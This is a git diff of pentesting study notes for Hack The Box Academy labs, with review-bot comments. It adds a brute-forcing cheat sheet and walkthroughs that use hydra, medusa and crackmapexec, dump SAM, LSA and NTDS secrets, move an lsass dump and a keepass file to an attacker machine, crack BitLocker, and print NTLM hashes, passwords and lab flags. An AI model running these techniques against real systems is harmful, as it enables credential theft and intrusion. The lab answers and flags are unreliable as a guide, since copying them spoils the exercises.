diff --git a/docs/brute-forcing.md b/docs/brute-forcing.md
index b2c151817..98593d620 100644
--- a/docs/brute-forcing.md
+++ b/docs/brute-forcing.md
@@ -1,5 +1,5 @@
-
+# Brute forcing
| Method | Description | Example | Best Used When... |
| ------------------------- | ----------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------- |
@@ -10,4 +10,74 @@
| `Password Spraying` | Attempts a small set of commonly used passwords against a large number of usernames. | Trying passwords like 'password123' or 'qwerty' against all usernames in an organization. | Account lockout policies are in place, and the attacker aims to avoid detection by spreading attempts across multiple accounts. |
| `Rainbow Table Attack` | Uses pre-computed tables of password hashes to reverse hashes and recover plaintext passwords quickly. | Pre-computing hashes for all possible passwords of a certain length and character set, then comparing captured hashes against the table to find matches. | A large number of password hashes need to be cracked, and storage space for the rainbow tables is available. |
| `Reverse Brute Force` | Targets a single password against multiple usernames, often used in conjunction with credential stuffing attacks. | Using a leaked password from one service to try logging into multiple accounts with different usernames. | A strong suspicion exists that a particular password is being reused across multiple accounts. |
-| `Distributed Brute Force` | Distributes the brute forcing workload across multiple computers or devices to accelerate the process. | Using a cluster of computers to perform a brute-force attack significantly increases the number of combinations that can be tried per second. | The target password or key is highly complex, and a single machine lacks the computational power to crack it within a reasonable timeframe. |
\ No newline at end of file
+| `Distributed Brute Force` | Distributes the brute forcing workload across multiple computers or devices to accelerate the process. | Using a cluster of computers to perform a brute-force attack significantly increases the number of combinations that can be tried per second. | The target password or key is highly complex, and a single machine lacks the computational power to crack it within a reasonable timeframe. |
+
+
+[See Default Credentials Cheat Sheet](default-creds.md)
+
+
+```bash
+ creds search mysql
+```
+
+
+Dictionaries of common admin usernames: https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt
+
+
+|Password Length|Character Set|Possible Combinations|
+|---|---|---|
+|`Short and Simple`|6|Lowercase letters (a-z)|26^6 = 308,915,776|
+|`Longer but Still Simple`|8|Lowercase letters (a-z)|26^8 = 208,827,064,576|
+|`Adding Complexity`|8|Lowercase and uppercase letters (a-z, A-Z)|52^8 = 53,459,728,531,456|
+|`Maximum Complexity`|12|Lowercase and uppercase letters, numbers, and symbols|94^12 = 475,920,493,781,698,549,504|
+
+
+
+
+| Wordlist | Description | Typical Use | Source |
+| --------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------ | -------------------------------------------------- | ----------------------------------------------------------------------------------------------------------- |
+| `rockyou.txt` | A popular password wordlist containing millions of passwords leaked from the RockYou breach. | Commonly used for password brute force attacks. | [RockYou breach dataset](https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt) |
+| `top-usernames-shortlist.txt` | A concise list of the most common usernames. | Suitable for quick brute force username attempts. | [SecLists](https://github.com/danielmiessler/SecLists/tree/master) |
+| `xato-net-10-million-usernames.txt` | A more extensive list of 10 million usernames. | Used for thorough username brute forcing. | [SecLists](https://github.com/danielmiessler/SecLists/tree/master) |
+| `2023-200_most_used_passwords.txt` | A list of the 200 most commonly used passwords as of 2023. | Effective for targeting commonly reused passwords. | [SecLists](https://github.com/danielmiessler/SecLists/tree/master) |
+| `Default-Credentials/default-passwords.txt` | A list of default usernames and passwords commonly used in routers, software, and other devices. | Ideal for trying default credentials. | |
+| [darkweb2017-top10000.txt](https://github.com/danielmiessler/SecLists/blob/master/Passwords/darkweb2017-top10000.txt) | | | https://github.com/danielmiessler/SecLists/blob/master/Passwords/darkweb2017-top10000.txt |
+
+
+Using grep to filter out dictionaries based on password policies. For instance we have the following policies for passwords:
+
+- Minimum length: 8 characters
+- Must include:
+ - At least one uppercase letter
+ - At least one lowercase letter
+ - At least one number
+
+Filtering minimum length of 8 characters:
+
+```shell-session
+grep -E '^.{8,}$' dicionary.txt > dictionary-minlength.txt
+```
+
+At least one uppercase letter:
+
+```shell-session
+grep -E '[A-Z]' dictionary-minlength.txt > dictionary-minlength-uppercase.txt
+```
+
+At least one lowercase letter.
+
+```shell-session
+grep -E '[a-z]' dictionary-minlength-uppercase.txt > dictionary-minlength-uppercase-lowercase.txt
+```
+
+At least one numerical digit
+
+```shell-session
+grep -E '[0-9]' dictionary-minlength-uppercase-lowercase.txt > dictionary-minlength-uppercase-lowercase-number.txt
+```
+
+Or in one step:
+
+```shell-session
+grep -E '^.{6,}$' dictionary.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' | grep -E '([!@#$%^&*].*){2,}' > dictionary-filtered.txt
+```
\ No newline at end of file
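Review bot: the character-set table (`|Password Length|Character Set|Possible Combinations|`) declares three columns but every row has four cells, so the scenario label column (`Short and Simple`, ...) has no header and the table will not render; add a leading header such as `|Scenario|Password Length|Character Set|Possible Combinations|` and a fourth `---` separator. Further points in this hunk: the first grep command reads `dicionary.txt` (typo for `dictionary.txt`); the combined one-liner uses `^.{6,}$` and adds a two-special-characters filter, which does not match the stated policy (minimum 8, upper, lower, digit) that the step-by-step commands implement, so either change it to `^.{8,}$` and drop the symbol filter or update the policy text; the wordlist table leaves the Source cell empty for `Default-Credentials/default-passwords.txt` and the Description/Typical Use cells empty for `darkweb2017-top10000.txt`; the `creds search mysql` line carries a leading space inside the fence; the new blocks mix ```bash and ```shell-session fences, so pick one.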
diff --git a/docs/cpts-index.md b/docs/cpts-index.md
index 826313edf..60fef3728 100644
--- a/docs/cpts-index.md
+++ b/docs/cpts-index.md
@@ -25,7 +25,7 @@ tags:
| 12 | Active Directory Enumeration & Attacks | [Active Directory](active-directory.md)
**From Linux:**
- [Enumeration](active-directory-from-linux-enumeration.md),
- [Attacks](active-directory-from-linux-attacks.md),
- [Lateral Movements](active-directory-from-linux-lateral-movement.md),
- [Privilege Escalation](active-directory-from-linux-privilege-escalation.md).
**From Windows:**
- [Enumeration](active-directory-from-windows-enumeration.md),
- [Attacks](active-directory-from-windows-attacks.md),
- [Privilege Escalation](active-directory-from-windows-privilege-escalation.md).
**Tools:**
- [Powershell](powershell.md),
- [Active Directory powershell Module](activedirectory-powershell-module.md),
- [Enumeration with LDAP queries](389-636-ldap.md)
- [PowerView.ps1 from PowerSploit project (powershell)](powerview.md).
- [The ActiveDirectory PowerShell module (powershell)](activedirectory-powershell-module.md).
- [BloodHound (C# and PowerShell Collectors)](bloodhound.md).
- [SharpView (C#)](sharpview.md).
- [kerbrute](kerbrute.md).
- [Crackmapexec](crackmapexec.md).
- [enum4linux](enum4linux.md). | 7 days | Exploitation & Lateral Movement | |
| 13 | Using Web Proxies | [Proxies](proxies.md): [burpsuite](burpsuite.md), [zap-proxy](owasp-zap.md), [proxychains](proxychains.md) | 8 hours | Web Exploitation | |
| 14 | Attacking Web Applications with Ffuf | [ffuf](ffuf.md) | 5 hours | Web Exploitation | |
-| 15 | Login Brute Forcing | | 6 hours | Web Exploitation | |
+| 15 | Login Brute Forcing | [Brute forcing](brute-forcing.md)
[Hydra](hydra.md)
[Medusa](medusa.md)
[Username-anarchy](username-anarchy.md)
[CUPP](cupp-common-user-password-profiler.md)
| 6 hours | Web Exploitation | |
| 16 | SQL Injection Fundamentals | - [Detailed SQLi Cheat sheet for manual attack](sqli-manual-attack.md).
- [SQL injection](webexploitation/sql-injection.md)
- [NoSQL injection](webexploitation/nosql-injection.md)
- [SQLite injections](webexploitation/sqlite-injections.md) | 8 hours | Web Exploitation | |
| 17 | SQLMap Essentials | | 8 hours | Web Exploitation | |
| 18 | Cross-Site Scripting (XSS) | [XSS](webexploitation/cross-site-scripting-xss.md) | 6 hours | Web Exploitation | |
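Review bot: the new module-15 cell lists its links one per line without the `- ` bullets and trailing commas that the neighbouring module-12 and module-16 cells use, and the closing `| 6 hours | Web Exploitation | |` fragment sits on its own line; for consistency write `- [Hydra](hydra.md),` and so on, and keep the trailing cells on the last link line as module 12 does (`- [enum4linux](enum4linux.md). | 7 days | ...`).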
diff --git a/docs/cpts-labs.md b/docs/cpts-labs.md
index 35acd1671..49e702d79 100644
--- a/docs/cpts-labs.md
+++ b/docs/cpts-labs.md
@@ -25,7 +25,6 @@ sudo nmap -sC -sV -p8080 $ip
**Results**: Apache Tomcat
-
**Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.**
```
@@ -2392,7 +2391,7 @@ sudo hashcat -m 1000 c02478537b9727d391bc80011c2e2321 /usr/share/wordlists/rocky
```
# Another way to do it is running crackmapexec from the attacking machine:
-crackmapexec smb 10.129.77.211 --local-auth -u bob -p HTB_@cademy_stdnt! --sam
+crackmapexec smb $ip --local-auth -u bob -p HTB_@cademy_stdnt! --sam
```
Results: matrix
@@ -2401,7 +2400,7 @@ Results: matrix
**RDP to with user "Bob" and password "HTB_@cademy_stdnt!". Dump the LSA secrets on the target and discover the credentials stored. Submit the username and password as the answer. (Format: username:password, Case-Sensitive)**
```
-crackmapexec smb 10.129.77.211 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
+crackmapexec smb $ip --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
```
Results: frontdesk:Password123
@@ -2420,7 +2419,7 @@ Results: lsass.exe
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData ~/borrar
# From the RDP connection open a powershell with Admin rights:
-move C:\Users\HTB-ST~1\AppData\Local\Temp\lsass.DMP \\10.10.15.90\CompData
+move C:\Users\HTB-ST~1\AppData\Local\Temp\lsass.DMP \\$ipKali$\CompData
# Crack the lsass file withPypykatz
pypykatz lsa minidump ~/borrar/lsass.DMP
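Review bot: `\\$ipKali$\CompData` has a stray `$` after the variable name, and since this `move` runs in the PowerShell session on the RDP target, `$ipKali` (a variable of the attacking shell) is undefined there and expands to nothing; use an explicit placeholder such as `\\<ATTACKER_IP>\CompData` or state that the variable must be set in that PowerShell session. Also `withPypykatz` in the following comment is missing a space.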
@@ -2496,10 +2495,10 @@ cd username-anarchy
# Save these names under usernames.txt
# Enumerate services
- sudo nmap -sC -sV 10.129.202.85 -Pn
+ sudo nmap -sC -sV $ip -Pn
# Run a password attack:
-crackmapexec winrm 10.129.202.85 -u ~/borrar/usernames.txt -p /usr/share/wordlists/fasttrack.txt --sam
+crackmapexec winrm $ip -u ~/borrar/usernames.txt -p /usr/share/wordlists/fasttrack.txt --sam
# Results:
SMB 10.129.202.85 445 ILF-DC01 [+] ILF.local\jmarston:P@ssword! (Pwn3d!)
@@ -2513,7 +2512,7 @@ Results: jmarston:P@ssword!
```bash
# Alternative 1: crackmapexec
-crackmapexec smb 10.129.202.85 -u jmarston -p P@ssword! --ntds
+crackmapexec smb $ip-u jmarston -p P@ssword! --ntds
# Crack the hash
hashcat -m 1000 92fd67fd2f49d0e83744aa82363f021b /usr/share/wordlists/rockyou.txt
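Review bot: `crackmapexec smb $ip-u jmarston ...` lost the space between `$ip` and `-u`, so the shell passes a single `<ip>-u` token as the target and the username is never supplied; restore `crackmapexec smb $ip -u jmarston -p P@ssword! --ntds`.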
@@ -2523,7 +2522,7 @@ hashcat -m 1000 92fd67fd2f49d0e83744aa82363f021b /usr/share/wordlists/rockyou.tx
# Alternative 2
# 1. Connecting to a DC with Evil-WinRM
-evil-winrm -i 10.129.202.85 -u jmarston -p 'P@ssword!'
+evil-winrm -i $ip -u jmarston -p 'P@ssword!'
# 2. Checking Local Group Membership
net localgroup
@@ -2683,7 +2682,7 @@ echo LoveYou1 > originalpass.txt
hashcat --force originalpass.txt -r custom.rule --stdout | sort -u > mutatedlist.list
# Now we launch our attack:
-hydra -l kira -P mutatedlist.list ssh://10.129.229.2
+hydra -l kira -P mutatedlist.list ssh://$ip
# Results: [22][ssh] host: 10.129.229.2 login: kira password: L0vey0u1!
ssh kira@$ip
@@ -2808,7 +2807,7 @@ Results: JuL1()_SH@re_fl@g
```powershell
# We wnumerate the possible IPs for DC fron our RDP connection
-1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}
+1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}
# It might be 172.16.1.10
# In the running RDP connection we have we will open a powershell terminal as julio, by using mimikatz and a passthehash
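Review bot: the sweep fix (172.15.5 to 172.16.5) is correct; while here, the comment line above has two typos (`wnumerate`, `fron`), and the following comment `It might be 172.16.1.10` names an address outside the 172.16.5.0/24 range that was just swept, so either the sweep range or that comment needs correcting.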
@@ -2935,11 +2934,11 @@ Results: DONE
```
# Enum services
-nmap -p 22,2222,3389 10.129.32.62
+nmap -p 22,2222,3389 $ip
```
```
-Nmap scan report for 10.129.32.62
+Nmap scan report
Host is up (0.16s latency).
PORT STATE SERVICE
@@ -3179,14 +3178,15 @@ Our client Inlanefreight contracted us to assess individual hosts in their netwo
```powershell
# Enumerate services
-sudo nmap -sC -sV 10.129.202.219 -Pn
+sudo nmap -sC -sV $ip -Pn
# Output: port 21 and 22
# Download the resources files with userlist and password list and generated a mutated list:
hashcat --force password.list -r custom.rule --stdout | sort -u > mutatedlist.list
# Launch a password attack with the username.list and password.list resource provided
-hydra -L username.list -P password.list ftp://10.129.202.219 # output: [21][ftp] host: 10.129.202.219 login: mike password: 7777777
+hydra -L username.list -P password.list ftp://$ip
+# output: [21][ftp] host: $ip login: mike password: 7777777
# Now we access the ftp service with the creds
ftp $ip
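Review bot: moving the output onto its own comment line is good, but the block still builds `mutatedlist.list` with hashcat and then runs hydra with `-P password.list`, so the mutated list is generated and never used; either pass `-P mutatedlist.list` or drop the hashcat line. Also `generated a mutated list` should read `generate a mutated list`.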
@@ -3232,15 +3232,15 @@ sudo nmap -sC -sV $ip -Pn
hashcat --force password.list -r custom.rule --stdout > mut_password.list
# Use a password attack with cracmapexec and the smb service
-crackmapexec smb 10.129.153.184 -u username.list -p mut_password.list
+crackmapexec smb $ip -u username.list -p mut_password.list
# Output: SMB 10.129.153.184 445 SKILLS-MEDIUM [+] \john:123456
# Enumerate samba services with user john
-smbclient -L 10.129.153.184 -U john
+smbclient -L $ip -U john
# Enter password: 123456
# Access the service
-smbclient \\\\10.129.153.184\\SHAREDRIVE -U john
+smbclient \\\\$ip\\SHAREDRIVE -U john
# Enter password: 123456
# Enumerate and download zip file
@@ -3333,11 +3333,121 @@ hydra -l johanna -P unique_passwords.list -t 64 -w 2 -f rdp://$ip
# Connect to the host via RDP
xfreerdp /u:johanna /p:'1231234!' /v:$ip /cert:ignore
+# Browsing around we spot the file Logins.kdbx, a typical keepass file. We will transfer it to our kali machine to try to crack it offline:
+
+# 1. From the kali machine, we will serve the PSUpload.ps1 script
+python3 -m http.server 8001
+
+# 2. From the RDP connection we will download the PSUpload.ps1 to c:\Users\johanna\Documents. Open a powershell
+cd c:\Users\johanna\Documents
+Invoke-WebRequest http://$ipKali:8001/PSUpload.ps1 -Outfile PSUpload.ps1
+
+# 3. From the kali machine, launch uploadserver. It will listen on port 8000
+python3 -m uploadserver
+
+# 4. From the RDP connection, import the PSUpload module and upload the keepass file to our kali attacking machien:
+Import-Module .\PSUpload.ps1
+Invoke-FileUpload -Uri http://$ipAttackingmachien:8000/upload -File C:\Users\johanna\Documents\Logins.kdbx
+
+# From attacking machine, use the module keepass2john to extract a hash:
+keepass2john Logins.kdbx > keepass.hashes
+
+# Launch a dictionary attack:
+john --wordlist=mut_password.list keepass.hashes
+# Output: Qwerty7!
+
+# Now in the RDP connection, open the keepass file and enter the masterkey. You will access to the creds:
+# david:gRzX7YbeTcDG7
+
+# With these creds we can access the samba share service. We enumerate and access
+smbmap -H $ip -U david
+smbclient \\\\$ip\\david -U david
+
+# We list and note an interesting file. Download it.
+dir
+get Backup.vhd
+
+# Now we will try to crack it. First we will extract the hashes
+bitlocker2john -i Backup.vhd > backup.hashes
+grep "bitlocker\$0" backup.hashes > backup.hash
+
+# And now we crack it
+hashcat -m 22100 backup.hash mut_password.list -o backup.cracked
+cat backup.cracked
+# Output: 123456789!
+
+
+# Install the libguestfs-tools package, which provides tools for accessing and manipulating virtual disk images (e.g., .vhd files).
+sudo apt-get install libguestfs-tools
+
+# Install the cifs-utils package, which is used for mounting SMB (CIFS) network shares.
+sudo apt-get install cifs-utils
+
+# Install the dislocker package, which is used for accessing BitLocker-encrypted drives on Linux.
+sudo apt install dislocker
+
+# Create directories where the BitLocker volume and its decrypted contents will be mounted.
+sudo mkdir /media/backup_bitlocker /media/mount
+
+# Attach the .vhd file located at /mnt/smbshare/backup.vhd to a loop device (/dev/loop100)
+# and scan for partitions (using the -P flag).
+sudo losetup -P /dev/loop100 /mnt/smbshare/backup.vhd
+
+# Use dislocker to unlock the BitLocker-encrypted partition (/dev/loop100p2).
+# The -v flag enables verbose output, -V specifies the BitLocker partition,
+# and -u prompts for the BitLocker password. The decrypted data is mounted to /media/backup_bitlocker.
+sudo dislocker -v -V /dev/loop100p2 -u -- /media/backup_bitlocker
+
+# Mount the dislocker-file (the virtual decrypted representation of the BitLocker drive) as a loop device and make it writable. The contents will be accessible at /media/mount.
+sudo mount -o loop,rw /media/backup_bitlocker/dislocker-file /media/mount
+
+# List the contents of the decrypted and mounted BitLocker volume to verify the files are accessible.
+ls -la /media/mount
```
-Results:
+```
+# Output
+total 19104
+drwxrwxrwx 1 root root 0 Feb 11 2022 '$RECYCLE.BIN'
+drwxrwxrwx 1 root root 4096 Feb 11 2022 .
+drwxr-xr-x 6 root root 4096 Jan 20 17:25 ..
+-rwxrwxrwx 1 root root 77824 Feb 11 2022 SAM
+-rwxrwxrwx 1 root root 19472384 Feb 11 2022 SYSTEM
+drwxrwxrwx 1 root root 4096 Feb 11 2022 'System Volume Information'
+```
+
+
+```
+# We can use secretsdump to extract the hives:
+python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam SAM -system SYSTEM LOCAL
+```
+
+```
+[*] Target system bootKey: 0x62649a98dea282e3c3df04cc5fe4c130
+[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
+Administrator:500:aad3b435b51404eeaad3b435b51404ee:e53d4d912d96874e83429886c7bf22a1:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9e73cc8353847cfce7b5f88061103b43:::
+sshd:1000:aad3b435b51404eeaad3b435b51404ee:6ba6aae01bae3868d8bf31421d586153:::
+david:1009:aad3b435b51404eeaad3b435b51404ee:b20d19ca5d5504a0c9ff7666fbe3ada5:::
+johanna:1010:aad3b435b51404eeaad3b435b51404ee:0b8df7c13384227c017efc6db3913374:::
+[*] Cleaning up...
+```
+
+```
+# Cracking the Administrator NTLM
+hashcat -m 1000 e53d4d912d96874e83429886c7bf22a1 mut_passwords.list
+# Output: Liverp00l8!
+# Access with RDP
+xfreerdp /u:Administrator /p:'Liverp00l8!' /v:$ip /cert:ignore
+
+# Open the flag.txt in the Desktop
+```
+
+Results: HTB{PWcr4ck1ngokokok}
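Review bot: the attacker-side address is named inconsistently and referenced in the wrong shell: step 2 uses `$ipKali`, step 4 uses `$ipAttackingmachien` (typo), and both `Invoke-WebRequest` and `Invoke-FileUpload` run in the PowerShell session on the RDP target, where neither variable exists; use one explicit placeholder such as `<ATTACKER_IP>` in both places. Other points in this hunk: the file is fetched as `Backup.vhd` into the working directory via `smbclient get`, but `losetup` attaches `/mnt/smbshare/backup.vhd` (different path and case); the final hashcat run reads `mut_passwords.list` while every earlier command uses `mut_password.list`; `apt-get install` and `apt install` are mixed; typos `machien` (twice) and `You will access to the creds` (should be `You will get access to the creds`).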
@@ -6222,6 +6332,183 @@ Results: HTB{w3b_fuzz1n6_m4573r}
## [Login Brute Forcing](https://academy.hackthebox.com/module/details/57)
+### Brute Force Attacks
+
+**After successfully brute-forcing the PIN, what is the full flag the script returns?**
+
+Run the provided script. Also you can do it from Burpsuite.
+
+Results: HTB{Brut3_F0rc3_1s_P0w3rfu1}
+
+
+**After successfully brute-forcing the target using the script, what is the full flag the script returns?**
+
+Run the provided script. Also you can do it from Burpsuite.
+
+HTB{Brut3_F0rc3_M4st3r}
+
+
+### Hydra
+
+**Basic HTTP Authentication- After successfully brute-forcing, and then logging into the target, what is the full flag you find?**
+
+```
+hydra -l basic-auth-user -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt 94.237.63.111 -s 32110 http-get /
+```
+
+Results: HTB{th1s_1s_4_f4k3_fl4g}
+
+**Login Forms- After successfully brute-forcing, and then logging into the target, what is the full flag you find?**
+
+```bash
+hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt -f 94.237.63.111 -s 47017 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"
+# Output: [47017][http-post-form] host: 94.237.63.111 login: admin password: zxcvbnm
+
+```
+
+Results: HTB{W3b_L0gin_Brut3F0rc3}
+
+
+### Medusa
+
+What was the password for the ftpuser?
+
+```
+medusa -u sshuser -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt -M ssh -h 83.136.253.44 -n 45938 -t 3
+# Output: 2025-01-20 19:57:42 ACCOUNT FOUND: [ssh] Host: 83.136.253.44 User: sshuser Password: 1q2w3e4r5t [SUCCESS]
+
+# Connect via ssh
+ssh sshuser@83.136.253.44 -p 45938
+
+# Reconnaissance
+nmap localhost
+
+# From the local target machine:
+medusa -h 127.0.0.1 -u ftpuser -P 2020-200_most_used_passwords.txt -M ftp -t 5
+# Output: ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: ftpuser Password: qqww1122 [SUCCESS]
+
+# From the target machine connect to FTP
+ftp ftpuser@$ip
+# Enter password: qqww1122
+dir
+get flag.txt
+quit
+
+cat flag.txt
+```
+
+Results: qqww1122
+
+**After successfully brute-forcing the ssh session, and then logging into the ftp server on the target, what is the full flag found within flag.txt?**
+
+Results: HTB{SSH_and_FTP_Bruteforce_Success}
+
+
+### Custom Wordlists
+
+**After successfully brute-forcing, and then logging into the target, what is the full flag you find?**
+
+
+```
+# Generate usernames
+./username-anarchy Jane Smith > jane_smith_usernames.txt
+
+# Generate passwords
+cupp -i
+```
+
+```
+Output
+> First Name: Jane
+> Surname: Smith
+> Nickname: Janey
+> Birthdate (DDMMYYYY): 11121990
+
+
+> Partners) name: Jim
+> Partners) nickname: Jimbo
+> Partners) birthdate (DDMMYYYY): 12121990
+
+
+> Child's name:
+> Child's nickname:
+> Child's birthdate (DDMMYYYY):
+
+
+> Pet's name: Spot
+> Company name: AHI
+
+
+> Do you want to add some key words about the victim? Y/[N]: y
+> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: hacker,juice,black], spaces will be removed: hacker,blue
+> Do you want to add special chars at the end of words? Y/[N]: y
+> Do you want to add some random numbers at the end of words? Y/[N]:y
+> Leet mode? (i.e. leet = 1337) Y/[N]: y
+
+[+] Now making a dictionary...
+[+] Sorting list and removing duplicates...
+[+] Saving dictionary to jane.txt, counting 52058 words.
+[+] Now load your pistolero with jane.txt and shoot! Good luck!
+```
+
+```
+# Filter passwords
+grep -E '^.{6,}$' jane.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' | grep -E '([!@#$%^&*].*){2,}' > dictionary-filtered.txt
+
+# Launch hydra attack:
+hydra -L jane_smith_usernames.txt -P dictionary-filtered.txt 94.237.50.7 -s 32234 -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
+
+# Output: [32234][http-post-form] host: 94.237.50.7 login: jane password: 3n4J!!
+
+# Login into the target
+```
+
+Results: HTB{W3b_L0gin_Brut3F0rc3_Cu5t0m}
+
+
+### Skills Assessment Part 1
+
+The first part of the skills assessment will require you to brute-force the the target instance. Successfully finding the correct login will provide you with the username you will need to start Skills Assessment Part 2.
+
+**What is the password for the basic auth login?**
+
+```bash
+# We have the provided lists: usernames.txt and passwords.txt
+hydra -L usernames.txt -P passwords.txt -f 83.136.253.44 -s 44641 http-get
+
+# Output: [44641][http-get] host: 83.136.253.44 login: admin password: Admin123
+
+```
+
+
+Results: Admin123
+
+**After successfully brute forcing the login, what is the username you have been given for the next part of the skills assessment?**
+
+```bash
+# Access the site with user and password and the name is retrieved
+```
+
+Results: satwossh
+
+
+
+### Skills Assessment Part 2
+
+This is the second part of the skills assessment. `YOU NEED TO COMPLETE THE FIRST PART BEFORE STARTING THIS`. Use the username you were given when you completed part 1 of the skills assessment to brute force the login on the target instance.
+
+What is the username of the ftp user you find via brute-forcing?
+
+```
+sudo nmap -sV -sC $ip -Pn -p-
+
+```
+
+
+What is the flag contained within flag.txt
+
+
+
## [SQL Injection Fundamentals](https://academy.hackthebox.com/module/details/33)
### MySQL
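Review bot: the Skills Assessment Part 2 subsection is unfinished: both questions (`What is the username of the ftp user...` and `What is the flag contained within flag.txt`) have no `Results:` line, the nmap block is a bare command with no output, and the second question lacks the question mark and bold formatting every other question here uses; either complete it or leave it out of this commit. Other points: the Hydra and Medusa commands hard-code lab IPs (94.237.63.111, 83.136.253.44, 94.237.50.7) while this same commit replaces literal IPs with `$ip` elsewhere in the file; the Medusa block runs medusa against `127.0.0.1` from the target and then connects with `ftp ftpuser@$ip`, which should be `ftp ftpuser@127.0.0.1` to match; `2020-200_most_used_passwords.txt` looks like a typo for the `2023-200_most_used_passwords.txt` used above; the cupp transcript line `Please enter the words...` has a duplicated prompt fragment pasted into it; `What was the password for the ftpuser?` is not bold like the other questions and the second Brute Force Attacks answer lacks the `Results:` prefix; `the the target instance` is doubled; the custom-wordlist hydra line writes the failure condition as `:Invalid credentials` whereas the Hydra section uses `:F=Invalid credentials` (equivalent in hydra, but pick one form).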
diff --git a/docs/htb-cascade.md b/docs/htb-cascade.md
new file mode 100644
index 000000000..75f7eb13c
--- /dev/null
+++ b/docs/htb-cascade.md
@@ -0,0 +1,409 @@
+---
+title: CAscade - A HackTheBox machine
+author: amandaguglieri
+draft: false
+TableOfContents: true
+tags:
+ - walkthrough
+ - active
+ - directory
+ - windows
+ - medium
+---
+# HTB Cascade
+
+## user.txt
+
+Enumerate:
+
+```bash
+ sudo nmap -sC -sV $ip -Pn --top-ports 10000
+```
+
+Results:
+
+```
+Host is up (0.037s latency).
+Not shown: 8353 filtered tcp ports (no-response)
+PORT STATE SERVICE VERSION
+53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
+| dns-nsid:
+|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
+88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-13 19:01:30Z)
+135/tcp open msrpc Microsoft Windows RPC
+139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
+445/tcp open microsoft-ds?
+636/tcp open tcpwrapped
+3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
+3269/tcp open tcpwrapped
+5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+|_http-server-header: Microsoft-HTTPAPI/2.0
+|_http-title: Not Found
+49154/tcp open msrpc Microsoft Windows RPC
+49155/tcp open msrpc Microsoft Windows RPC
+49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+49158/tcp open msrpc Microsoft Windows RPC
+49165/tcp open msrpc Microsoft Windows RPC
+Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
+
+Host script results:
+| smb2-security-mode:
+| 2:1:0:
+|_ Message signing enabled and required
+|_clock-skew: -7m01s
+| smb2-time:
+| date: 2025-01-13T19:02:22
+|_ start_date: 2025-01-13T18:56:18
+
+```
+
+We enumerate users:
+
+```bash
+crackmapexec smb $ip --users
+```
+
+Results:
+
+```
+SMB 10.129.67.96 445 CASC-DC1 [+] Enumerated domain user(s)
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\CascGuest Built-in account for guest access to the computer/domain
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\arksvc
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\s.smith
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\r.thompson
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\util
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\j.wakefield
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\s.hickson
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\j.goodhand
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\a.turnbull
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\e.crowe
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\b.hanson
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\d.burman
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\BackupSvc
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\j.allen
+SMB 10.129.67.96 445 CASC-DC1 cascade.local\i.croft
+```
+
+
+
+
+```
+~/tools/kerbrute/dist/kerbrute_linux_amd64 userenum -d cascade.local --dc $ip ~/borrar/users.txt
+
+```
+
+
+
+
+```
+python3 ~/tools/impacket/examples/GetNPUsers.py CASCADE.LOCAL/ -dc-ip $ip -no-pass -usersfile ~/borrar/users.txt | grep -v SessionError
+
+
+python3 ~/tools/impacket/examples/GetNPUsers.py --dc-ip $ip CASCADE.LOCAL/Backupsvc -request
+```
+
+
+
+
+```
+ldapsearch -x -H ldaps://$ip -b "DC=CASCADE,DC=LOCAL" "(objectClass=user)"
+
+ldapsearch -x -H ldap://$ip -b "DC=CASCADE,DC=LOCAL" "(objectClass=user)" cn mail sAMAccountName
+
+```
+
+
+
+
+```
+
+```
+
+
+
+
+```
+
+```
+
+
+
